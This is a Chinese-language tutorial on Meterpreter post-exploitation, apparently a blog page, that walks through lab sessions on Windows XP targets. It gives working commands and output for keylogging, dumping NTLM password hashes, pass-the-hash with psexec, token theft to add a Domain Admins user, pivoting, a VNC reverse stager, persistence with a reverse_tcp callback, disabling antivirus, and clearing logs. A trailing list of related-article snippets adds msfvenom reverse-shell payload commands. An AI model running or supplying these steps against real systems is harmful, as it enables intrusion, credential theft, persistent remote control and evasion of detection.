kalimsfliak
kalimsfliak

Meterpreter

基本命令

  1. background 将meterpreter终端隐藏在后头
  2. sessions 查看已经成功获取的会话,如果想继续和某个会话进行交互,使用session -i命令
  3. quit 关闭当前会话
  4. shell 可以获取系统的控制台shell
  5. irb 可以在meterpreter中与ruby交互

文件系统命令

  1. cat 查看文件内容
  2. getwd 获得目标机上当前的工作目录
  3. upload 上传文件
    meterpreter > upload -h
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

    -h        Help banner
    -r        Upload recursively
  4. download 下载文件
  5. edit 可以调用vi编辑器,进行编辑
  6. search 搜索
    Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

    -d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
    -f <opt>  A file pattern glob to search for. (e.g. *secret*.doc?)
    -h        Help Banner
    -r <opt>  Recursivly search sub directories. (Default: true)

网络命令

  1. ipconfig 查看网络接口信息
  2. portfwd 端口转发
    meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
meterpreter > portfwd add -l 1234 -p 6001 -r 192.168.1.130
[*] Local TCP relay created: :1234 <-> 192.168.1.130:6001
  3. route 显示路由信息

系统命令

  1. ps 获得正在运行的进程信息
  2. migrate 将meterpreter会话从一个进程移植到另一个进程中
  3. execute 在目标机上执行文件
    meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token
meterpreter > execute -H -f cmd.exe
meterpreter > execute -H -m -d calc.exe -f wec.exe -a "-o foo.txt"
  4. getpid 获得当前会话所在进程的PID
  5. kill 终结会话
  6. getuid 获得运行meterpreter会话的用户名
  7. sysinfo 得到目标系统的一些信息
  8. shutdown 关机

1. 截屏

meterpreter > screenshot 
Screenshot saved to: /root/fLvRrVTL.jpeg

2. sysinfo

meterpreter > sysinfo
Computer        : DH-CA8822AB9589
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter >

3. 获取键盘记录,run post/windows/capture/keylog_recorder

meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch  Session  User                           Path
 ---   ----  ----                 ----  -------  ----                           ----
 0     0     [System Process]                                                   
 ...        
 1308  1012  explorer.exe         x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\Explorer.EXE
 ...

meterpreter > migrate 1308
[*] Migrating from 1420 to 1308...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against DH-CA8822AB9589
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20180926160428_default_10.10.10.100_host.windows.key_347969.txt
[*] Recording keystrokes...
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait... 

root@kali:~# vi /root/.msf4/loot/20180926160428_default_10.10.10.100_host.windows.key_347969.txt 
Keystroke log from explorer.exe on DH-CA8822AB9589 with user DH-CA8822AB9589\Administrator started at 2018-09-26 16:04:28 +0800

1qaz2w
sx3edc4rfv5tgb

Keylog Recorder exited at 2018-09-26 16:04:55 +0800

4. 挖掘用户名和密码hashdump,use priv

windows系统存储哈希值的方式一般为LAN Manager(LM)、NT LAN Manager(NTLM),或NT LAN Manager v2(NTLMv2)。
在LM存储方式中,当用户首次输入密码或更改密码的时候,密码被转换为哈希值,由于哈希长度的限制,将密码切分为7个字符一组的哈希值。以password123456的密码为例,哈希值以passwor和d123456的方式存储,所以攻击者只需要简单地破解7个字符一组的密码,而不是原始的4个字符。而NTLM的存储方式跟密码长度无关,密码password123456将作为整体转换为哈希值存储。

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7be839f49edcab29c3a40fe24d47335f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::

以aad3b435开头的哈希值是一个空的或不存在的哈希值(空字串的占位符)

5. 传递哈希值

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 10.10.10.200
LHOST => 10.10.10.200
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 10.10.10.100
RHOST => 10.10.10.100
msf exploit(psexec) > set SMBUSER administrator
SMBUSER => administrator
msf exploit(psexec) > set SMBPASS 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPASS => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > exploit 

[*] Started reverse TCP handler on 10.10.10.200:443 
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445 as user 'administrator'...
[-] 10.10.10.100:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

6. 权限提升

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DH-CA8822AB9589\bob
meterpreter >

7. 令牌假冒

7.1 使用PS

meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch  Session  User                 Path
 ---   ----  ----                 ----  -------  ----                 ----
 ...
 344   1308  cmd.exe              x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\system32\cmd.exe
 ...

7.2 使用steal_token命令假冒域管理员账号

meterpreter > steal_token 344
Stolen token with username: DH-CA8822AB9589\Administrator

7.3 或者使用incognito模块列举出令牌

meterpreter > use incognito 
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
DH-CA8822AB9589\Administrator
DH-CA8822AB9589\bob
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

7.4 扮演Administrator令牌并添加一个新用户:

meterpreter > impersonate_token DH-CA8822AB9589\\Administrator
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user DH-CA8822AB9589\Administrator
meterpreter > add_user omgcompromised password -h 10.10.10.100
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[*] Attempting to add user omgcompromised to host 10.10.10.100
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcomoromised -h 10.10.10.100
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller
10.10.10.100
[+] Successfully added user to group
meterpreter >

8. 通过跳板攻击其他机器

使用 run get_local_subnets,background,route add,route print,

meterpreter > sysinfo
Computer        : ANTENNA-B23E701
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > run get_local_subnets 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...

msf exploit(unix/ftp/vsftpd_234_backdoor) > route add 10.10.10.0 255.255.255.0 1
[*] Route added
msf exploit(unix/ftp/vsftpd_234_backdoor) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.

或者使用load auto_add_route,在攻击远程机器前使用,在攻破系统同时会有一个添加路由的操作

9. 使用Meterpreter脚本

VNC

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.210 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\LvyqUgisvE.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.210:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "antenna-b23e701"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

解锁桌面,run screen_unlock

迁移进程,run post/windows/manage/migrate

关闭杀毒软件,run killav

获取系统密码哈希值,run hashdump

查看目标机上所有流量,run packetrecorder -i 1

攫取系统信息,run scraper

控制持久化

运行persistence脚本让系统开机自动启动Meterpreter(-X),50秒(-i 50)重连一次,使用的端口为443(-p 443),连接的目的地址为192.168.1.210 。

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.210

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ANTENNA-B23E701_20180926.5455/ANTENNA-B23E701_20180926.5455.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=443
[*] Persistent agent script is 99665 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\YNbvBYkWbM.vbs
[*] Executing script C:\WINDOWS\TEMP\YNbvBYkWbM.vbs
[+] Agent executed with PID 2488
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\mPPZphFTpXu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\mPPZphFTpXu

在192.168.1.210上使用use multi/handler并设置必要的参数进行监听:

msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > set LHOST 192.168.1.210
LHOST => 192.168.1.210
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.210:443 
[*] 192.168.1.111 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (179779 bytes) to 192.168.1.111
[*] Meterpreter session 7 opened (192.168.1.210:443 -> 192.168.1.111:1026) at 2018-09-26 11:08:42 -0400
[*] AutoAddRoute: Routing new subnet 10.10.10.0/255.255.255.0 through session 7
[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 7
[-] The 'stdapi' extension has already been loaded.

meterpreter >

10. 将命令行shell升级为Meterpreter,sessions -u {sessionsid}

11. 通过附加的Railgun组件操作Windows API

meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"Hello","World","MB_OK")
meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"Computer"=>"ROOT-TVI862UBEH", "OS"=>"Windows .NET Server (Build 3790).", "Architecture"=>"x86", "BuildTuple"=>nil, "System Language"=>"en_US", "Domain"=>"WORKGROUP", "Logged On Users"=>2}
>> client.railgun.shell32.IsUserAnAdmin
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
>> client.railgun.kernel32.SetThreadExecutionState("ES_CONTINUOUS|ES_SYSTEM_REQUIRED")
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>2147483648}

12. 掩踪灭迹

  • clearev 清除访问日志
  • timestomp 修改文件的创建、最后访问的时间

13. 内网拓展

  • 添加路由 用route命令添加路由
  • 进行端口扫描
  • 利用哈希口令进行攻击
  • MS08-068和MS10-046漏洞配合
  • 搭建SMB服务器 smb_relay模块
  • 结果分析

15. 信息窃取

  • dumplink 获得目标主机最近进行的系统操作,访问文件和文档的操作记录
  • enum_applications 获得目标主机安装的软件,安全更新与漏洞补丁的信息
  • keyscan 键盘记录的用户输入模块

14. 口令摄取和利用

  • 网络嗅探 sniffer模块
  • 通过浏览器进行摄取 enum_ie模块 读取缓存的IE浏览器密码
  • 系统口令摄取 hashdump 直接获取系统的密码哈希 smart_hashdump 后渗透模块hash口令利用:直接用破解工具破解或者直接重放利用psexec: 利用系统口令哈希进行传递攻击

你可能感兴趣的:(Meterpreter)

  • 内网渗透概述 BTY@BTY 服务器运维网络安全安全web安全
    渗透概念正向shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。攻击者–>被攻击者反向shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。攻击者abc.exeAndroidAndroid:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.107.129LPORT=5555R>/r
  • 红日三打靶!!! 郑居中3.0 红日安全红日三靶机Gaara靶机redispythoneclipse
    红日三,黑盒测试环境搭建一.外网打点1.网段探测2.端口服务扫描3.目录扫描4.网站漏洞扫描5.汇总,找破绽6.登陆MySQL改密码7.进入后台,找能写马的地方8.蚁剑连接9.disable_functions绕过1.蚁剑插件绕过2.bypass_disablefunc_via_LD_PRELOAD绕过10.分析11.ssh连接二.脏牛提权三.拿root用户的meterpreter1.msfven
  • python免杀 只喜欢打乒乓球 python开发语言网络安全web安全
    实验靶机:win10攻击机:kali192.168.117.1291.先在kali上输入msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.117.129LPORT=4444-fpy打开vs新建一个python文件、写入64位加载#!/usr/bin/pythonimportctypes#这里直接粘贴刚刚msf生成的shellcod
  • 红日靶场之sta&&ck远程桌面控制 个人学习) 曼达洛战士 学习
    我们首先打开webshell工具然后切换到C盘的www的文件夹下面然后我们打开MSF工具进行监听模板msfconsole启动MSF工具然后是useexploit/multi/handler使用漏洞辅助模块setpayloadwindows/meterpreter/reverse_tcp这是利用漏洞tcp回弹模块setlhost192.168.52.129这是设置回弹的主机这里是我们的kali攻击机
  • meterpreter后期攻击使用方法 小银同学阿
    meterpreter后期攻击使用方法1、上传文件到Windows主机upload命令2:从windows主机下载文件download注意:Windows路径要使用双斜线命令3:在目标主机上执行exe文件execute-f[options]例:execute-fc://1.exe命令4:创建CMD新通道execute-fcmd-c命令5:显示进程(相当于打开任务管理器)ps命令会显示目标主机上所有
  • vulnhub--DC1 baiyexing8 数据库php安全
    一.信息收集扫存活主机arp-scan-l扫描靶场开放端口nnap-sS-v192.168.111.130查看80端口二.漏洞利用msf攻击拿到meterpreter以后查看当前目录,发现flag1.txt,cat得到flag1根据flag1的提示百度,得到Drupal的数据库配置文件在sites/default/settings.phpcatsetting.php得到flag2.txt三.提权接
  • MSF横向拓展(流量代理,端口代理转发)--详细教程 别动我的cat php网络开发语言网络安全
    一.通过被控制的受害者主机获取受害者主机所在的其他网络route获取受害者主机的路由表ipconfig/ifconfig查看当前主的网络情况通过上面两个命令发现win7是还连接着一个10.11.12.0/24的网络二.添加到达网络的路由1.通过meterpreter中的post/multi/manage/autoroute模块来添加到达主机的路径runpost/multi/manage/autor
  • 【精选】win7内网穿透&meterpreter后渗透&msf开启摄像头 hacker-routing 【精选】VulnHub渗透测试靶场练习平台webwindowslinux系统开发linux运维服务器网络网络安全kalimetersphere
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录###msf开启摄像头######meterpreter后渗透###win
  • 利用metasploit提权 shadowflow
    MS16-016漏洞提权实战启动msfuseexploit/multi/script/web_deliveryinfosettarget2showpayloadssetpayloadwindows/meterpreter/reverse_tcpshowoptionsexploit复制生成的powershell命令打开目标机,打开cmd,执行刚刚复制的内容连接getsystemgetuidshell
  • MSF+FRP实现内网渗透 无情剑客Burning
    声明:严禁用作非法目的,谢绝一切形式的转载。在这里对介绍了如何通过frp进行内网穿透。本篇文章将frp与MSF结合起来,实现获取被入侵机器("肉鸡")的控制权。网络拓扑通过家庭kali主机,获取到肉鸡的meterpreter。frp配置frpsfrp服务器端配置文件frps.ini如下:使用了dashboard。通过dashboard可以查看frp服务器的状态。运行frps./frps-cfrps
  • 使用SET+MSF 渗透工具对Win 7 靶机进行一次完整攻击记录 别JUAN我 网络服务器linux安全
    接上篇,演示SET+MSF渗透工具Win7虚拟机靶机进行生成木马、获得主机Shell、权限提升、远程桌面监控、日志清除、后门植入一套较为完整的攻击流程。kali攻击机:172.16.32.129win7被攻击机:172.16.32.128“”该文章仅用于学习交流“”1、第一步还是先使用SET,选择社会工程攻击。2、选择创建攻击载荷并监听,并使用Meterpreter攻击返回shell,接着设置监听
  • meterpreter木马原理分析 ~巴哥~ 恶意代码分析恶意代码分析
    本文主要分析meterpreter木马的原理,原理比较简单:首先会分配一段缓冲区,加载一段shellcode,在shellcode中调用winsocketAPI与服务器端进行通信,下载一个反射型dll,在内存中加载,使用peb的方式来获取系统的api地址,C2的地址是以整数的方式存储在代码中。环境kali192.168.213.130用于生成木马,搭建c2服务器windowsx64192.168.
  • CobaltStrike windows木马原理分析 ~巴哥~ 恶意代码分析恶意代码分析
    本文主要介绍CobaltStrikewindows型木马的原理,同Meterpreter大体类似。不同之处有使用了命名管道,使用了http的相关api来下载payload,同样使用的peb来获取api的地址,最后的后门是一个反射型dll。安装CobaltStrike环境环境:kali192.168.1.19cs服务器win10192.168.1.1cs客户端win7x64192.168.1.20测
  • Meterpreter的常用命令合集 先瘦个二十斤 shellmetasploitnethack安全经验分享
    0x01.基本命令help#查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill#杀死一个背景meterpreter脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions-inumber#与会话进行交互,number表示第n个session,使用session-i连接到指定
  • CVE-2018-4887 Flash漏洞 夜间飛行 网络安全
    目录1.目的2.原理3.操作过程编辑总结1.目的由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被KaliLinux控制2.原理攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。Meterpreter:一款开源的安全漏洞检测工具,可以帮助安全和
  • Metasploit框架(3), meterpreter 常用命令, sniffer流量监听, portfwd端口转发, kiwi, Mimikatz密码破解 DeltaTime 渗透测试-入侵提权渗透测试web安全
    Metasploit框架(3),meterpreter常用命令与扩展工具进入到meterpreter>提示符环境下才能执行命令一,常用命令sysinfo#系统信息getuid#当前用户getprivs#当前权限loadpriv#加载privgetsystem#提权到系统权限clearev#清除系统日志,安全日志,避免朔源quit#关闭meterpreter,关闭session连接,退回msf模块控
  • 【网络安全】meterpreter攻击实战 茗樱.Stella web安全安全
    1.meterpreter攻击成功后可以做什么指令?远程控制+命令执行+摄像头监控+密码获取+创建后门用户+破坏篡改系统。2.创建后门用户并开启远程连接:netuserzhangsan123456/add&&netlocalgroupadminstratorszhangsan/addexitrungetgul-e3.攻击系统:①reverse_tcp是一个基于TCP的反向链接反弹shell,使用起
  • msf复现永恒之蓝漏洞ms17-010(详解) 网安小t 安全网络安全系统安全
    目录实验环境实验目的永恒之蓝简介Metasploit简介复现永恒之蓝漏洞1首先使用namp扫描一下windows7编辑2使用工具3查找永恒之蓝漏洞模块4漏洞检测5实现漏洞利用6meterpreter命令举例实验环境kali攻击机172.23.19.152windows7靶机172.23.19.128实验目的通过MSF复现永恒之蓝漏洞永恒之蓝简介背景:永恒之蓝(EternalBlue)爆发于2017
  • MSF 详解 网安小t 系统安全网络安全web安全安全
    目录MSF官网MSF简介MSF框架结构kaliMetasploit更新常见名词解释MSF命令MSF命令查询数据库管理命令核心命令模块命令进程命令资源脚本命令后台数据库命令后端凭证命令开发者命令攻击载荷命令Meterpreter扩展模块Meterpreter常用命令Meterpreter核心命令Meterpreter文件系统命令Meterpreter网络命令Meterpreter系统命令Meterp
  • 红队攻防之特殊场景上线cs和msf 各家兴 #1.红队实战0.红队攻防#2.内网攻防python开发语言渗透测试web安全代码审计红队攻防攻防实战
    倘见玉皇先跪奏:他生永不落红尘本文首发于先知社区,原创作者即是本人网络拓扑图一、msf正向木马拿不出网域控shellmsf生成木马msfvenom-pwindows/x64/meterpreter/bind_tcplport=4444-fraw-omsf1.bin用msfvenom生成一个正向马传进去(因为无法访问外网,反向出不来),msf正向连接。域控上线msf通过域控web服务的shell进行
  • MSF学习笔记 xiaopeisec 渗透工具postgresql网络安全web安全
    目录一.MSF启动二.MSF目录结构于核心模块三.msfvenom常用参数四.基于MSF发现内网存活主机五.利用MSF创建后门程序六.Meterpreter常用命令常用命令:文件系统命令:用户设备命令:开启远程桌面收集信息针对未安装补丁攻击注册表设置nc后门一.MSF启动1.先启动postgresql数据库,这个是msf的默认数据库servicepostgresqlstart2.如果是第一次使用还
  • 3、MSF使用 PT_silver 深信服SCSA-S认证安全
    文章目录一、利用ms17-010漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用一、利用ms17-010漏洞对靶机执行溢出攻击分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:useexploit/windows/smb/ms17_010_eternalblue//使用ms17_010_eternalblue模块setRHOS
  • kali渗透内网和外网 孤寂204 网络安全服务器
    生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.ex
  • MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit qq_29060627 安全
    首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ipsetautorunscriptpost/windows/manage/migratename=services.exesetpayloadwindows/x64/meterpreter/reverse_tcpsetlport5577setlhost192.168
  • Linux下Meterpreter执行原理浅析 慕长风啊
    前言针对Meterpreter的投递流程和原理分析,网上已有一部分相关资料了但是大多是基于Windows系统,Linux下的分析资料好像并不全面。为此,我从源码入手,简单的分析了Linux下Meterpreter的生成和执行流程,以下记录了部分过程说明研究对象:linux/x86/meterpreter/reverse_tcp这种staged类型的payload,攻击过程通常是先由服务端生成一段s
  • 四种常用的meterpreter木马后门 孤独的一颗星
    msfvenom使用msfvenom软件生成木马后门,在目标机上执行后门,在本地机上监听上线。小提示:maf即是metasploit,venom即是病毒如果不知道msfvenom怎么用,可以msfvenom-h查看,四种生成后门的命令:windows可执行程序后门:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.ex
  • msf生成linux shellcode,使用MSF打造各种ShellCode weixin_39866419 msf生成linuxshellcode
    生成各种后门Windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-fexe-opayload.exeLinux:msfvenom-ax86--platformLinux-plinux/x8
  • python加载shellcode免杀 ctostm python网络开发语言网络安全web安全安全
    1、第一个shellcode加载器importctypes#msf生成的shellcode,命令:msfvenom-ex64/xor_dynamic-i16-pwindows/x64/meterpreter_reverse_tcplhost=192.168.111.111lport=80-fpy-oshell.pybuf=b""buf+=b"\xeb\x27\x5b\x53\x5f\xb0\xe7
  • windows提权思路 Yoloྀ 内网渗透学习记录windows系统安全安全性测试
    前言:分享学习心得,实操笔记记录当拿到的主机权限为普通权限时,尝试提权更方便我们去进行一系列的操作实操开始:一:MSF拿到权限在meterpreter下shell进入终端,systeminfo查看打了哪些补丁用这个网站blog.neargle.com/win-powerup-exp-index/二:MSF拿到权限在meterpreter下利用命令getsystem尝试提权到system权限三:MS
  • Windows权限维持 - Time windows
    Meterpreter权限维持Metasploit框架提供了一个后渗透模块,可实现自动化地利用沾滞键的权限维持技术。该模块将用CMD替换辅助功能的二进制文件(sethc,osk,disp,utilman)usepost/windows/manage/sticky_keys设置session提示:会话具有管理权限,正在进行。[+]已成功添加“粘滞键”。按SHIFT键5次,在RDP或UAC提示下启动该
  • 开发者关心的那些事 圣子足道 ios游戏编程apple支付
    我要在app里添加IAP,必须要注册自己的产品标识符(product identifiers)。产品标识符是什么? 产品标识符(Product Identifiers)是一串字符串,它用来识别你在应用内贩卖的每件商品。App Store用产品标识符来检索产品信息,标识符只能包含大小写字母(A-Z)、数字(0-9)、下划线(-)、以及圆点(.)。你可以任意排列这些元素,但我们建议你创建标识符时使用
  • 负载均衡器技术Nginx和F5的优缺点对比 bijian1013 nginxF5
            对于数据流量过大的网络中,往往单一设备无法承担,需要多台设备进行数据分流,而负载均衡器就是用来将数据分流到多台设备的一个转发器。         目前有许多不同的负载均衡技术用以满足不同的应用需求,如软/硬件负载均衡、本地/全局负载均衡、更高
  • LeetCode[Math] - #9 Palindrome Number Cwind javaAlgorithm题解LeetCodeMath
    原题链接:#9 Palindrome Number   要求: 判断一个整数是否是回文数,不要使用额外的存储空间   难度:简单   分析: 题目限制不允许使用额外的存储空间应指不允许使用O(n)的内存空间,O(1)的内存用于存储中间结果是可以接受的。于是考虑将该整型数反转,然后与原数字进行比较。 注:没有看到有关负数是否可以是回文数的明确结论,例如
  • 画图板的基本实现 15700786134 画图板
     要实现画图板的基本功能,除了在qq登陆界面中用到的组件和方法外,还需要添加鼠标监听器,和接口实现。 首先,需要显示一个JFrame界面: public class DrameFrame extends JFrame {              //显示
  • linux的ps命令 被触发 linux
    Linux中的ps命令是Process Status的缩写。ps命令用来列出系统中当前运行的那些进程。ps命令列出的是当前那些进程的快照,就是执行ps命令的那个时刻的那些进程,如果想要动态的显示进程信息,就可以使用top命令。 要对进程进行监测和控制,首先必须要了解当前进程的情况,也就是需要查看当前进程,而 ps 命令就是最基本同时也是非常强大的进程查看命令。使用该命令可以确定有哪些进程正在运行
  • Android 音乐播放器 下一曲 连续跳几首歌 肆无忌惮_ android
    最近在写安卓音乐播放器的时候遇到个问题。在MediaPlayer播放结束时会回调 player.setOnCompletionListener(new OnCompletionListener() { @Override public void onCompletion(MediaPlayer mp) { mp.reset(); Log.i("H
  • java导出txt文件的例子 知了ing javaservlet
    代码很简单就一个servlet,如下: package com.eastcom.servlet; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URLEncoder; import java.sql.Connection; import java.sql.Resu
  • Scala stack试玩, 提高第三方依赖下载速度 矮蛋蛋 scalasbt
    原文地址: http://segmentfault.com/a/1190000002894524 sbt下载速度实在是惨不忍睹, 需要做些配置优化 下载typesafe离线包, 保存为ivy本地库 wget http://downloads.typesafe.com/typesafe-activator/1.3.4/typesafe-activator-1.3.4.zip 解压r
  • phantomjs安装(linux,附带环境变量设置) ,以及casperjs安装。 alleni123 linuxspider
    1. 首先从官网 http://phantomjs.org/下载phantomjs压缩包,解压缩到/root/phantomjs文件夹。 2. 安装依赖 sudo yum install fontconfig freetype libfreetype.so.6 libfontconfig.so.1 libstdc++.so.6 3. 配置环境变量 vi /etc/profil
  • JAVA IO FileInputStream和FileOutputStream,字节流的打包输出 百合不是茶 java核心思想JAVA IO操作字节流
    在程序设计语言中,数据的保存是基本,如果某程序语言不能保存数据那么该语言是不可能存在的,JAVA是当今最流行的面向对象设计语言之一,在保存数据中也有自己独特的一面,字节流和字符流 1,字节流是由字节构成的,字符流是由字符构成的 字节流和字符流都是继承的InputStream和OutPutStream ,java中两种最基本的就是字节流和字符流   类 FileInputStream
  • Spring基础实例(依赖注入和控制反转) bijian1013 spring
    前提条件:在http://www.springsource.org/download网站上下载Spring框架,并将spring.jar、log4j-1.2.15.jar、commons-logging.jar加载至工程1.武器接口 package com.bijian.spring.base3; public interface Weapon { void kil
